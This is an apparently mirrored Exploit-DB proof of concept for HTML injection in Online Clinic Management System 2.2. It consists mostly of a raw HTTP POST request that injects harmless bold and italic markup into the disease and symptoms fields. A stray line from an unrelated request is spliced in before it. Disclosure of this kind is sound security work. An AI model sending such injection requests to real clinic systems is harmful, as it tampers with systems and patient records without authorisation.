Online Clinic Management System 2.2 – HTML Injection

• Exploit Database
• 13 阅读

• 作者： Cemal Cihad ÇİFTÇİ
  日期： 2019-12-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/47741/

• # Exploit Title: Online Clinic Management System 2.2 - HTML Injection
  # Date: 2019-11-29
  # Exploit Author: Cemal Cihad ÇİFTÇİ
  # Vendor Homepage: https://bigprof.com
  # Software Download Link : https://bigprof.com/appgini/applications/online-clinic-management-system
  # Software : Online Clinic Management System
  # Version : 2.2
  # Vulernability Type : HTML Injection
  # Vulenrability : HTM Injection
  
  # HTML Injection has been discovered in the Online Clinic Management System created by bigprof/AppGini
  # add disase symptom, patient and appointment section.
  # payload: <b><i>asd</i></b>
  
  # HTTP POST request
  
  POST /inovicing/app/admin/pageEditGroup.php HTTP/1.1
  Host: 10.10.10.160
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
  POST /clinic/disease_symptoms_view.php HTTP/1.1
  Host: 10.10.10.160
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
  Accept-Encoding: gzip, deflate
  Content-Type: multipart/form-data; boundary=---------------------------325041947016922
  Content-Length: 1501
  Origin: http://10.10.10.160
  Connection: close
  Referer: http://10.10.10.160/clinic/disease_symptoms_view.php
  Cookie: inventory=4eg101l42apiuvutr7vguma5ar; online_inovicing_system=vl8ml5or8sgdee9ep9lnhglk69; online_clinic_management_system=e3fqbalmcu4o9d4tvuuakpn9e8
  Upgrade-Insecure-Requests: 1
  
   -----------------------------325041947016922
  Content-Disposition: form-data; name="current_view"
  
   DV
  -----------------------------325041947016922
  
  Content-Disposition: form-data; name="SortField"
  -----------------------------325041947016922
  Content-Disposition: form-data; name="SelectedID"
  
  1
  -----------------------------325041947016922
  Content-Disposition: form-data; name="SelectedField"
  
  -----------------------------325041947016922
  Content-Disposition: form-data; name="SortDirection"
  
  -----------------------------325041947016922
  Content-Disposition: form-data; name="FirstRecord"
  
  1
  -----------------------------325041947016922
  Content-Disposition: form-data; name="NoDV"
  
  -----------------------------325041947016922
  Content-Disposition: form-data; name="PrintDV"
  
  -----------------------------325041947016922
  Content-Disposition: form-data; name="DisplayRecords" 
  
  all
  -----------------------------325041947016922
  Content-Disposition: form-data; name="disease"
  
  <b><i>asd</i></b>
  
  -----------------------------325041947016922
  Content-Disposition: form-data; name="symptoms"
  
  <b><i>asd</i></b>
  
  -----------------------------325041947016922
  Content-Disposition: form-data; name="reference"
  
  -----------------------------325041947016922
  Content-Disposition: form-data; name="update_x"
  
  1
  -----------------------------325041947016922
  Content-Disposition: form-data; name="SearchString"
  -----------------------------325041947016922--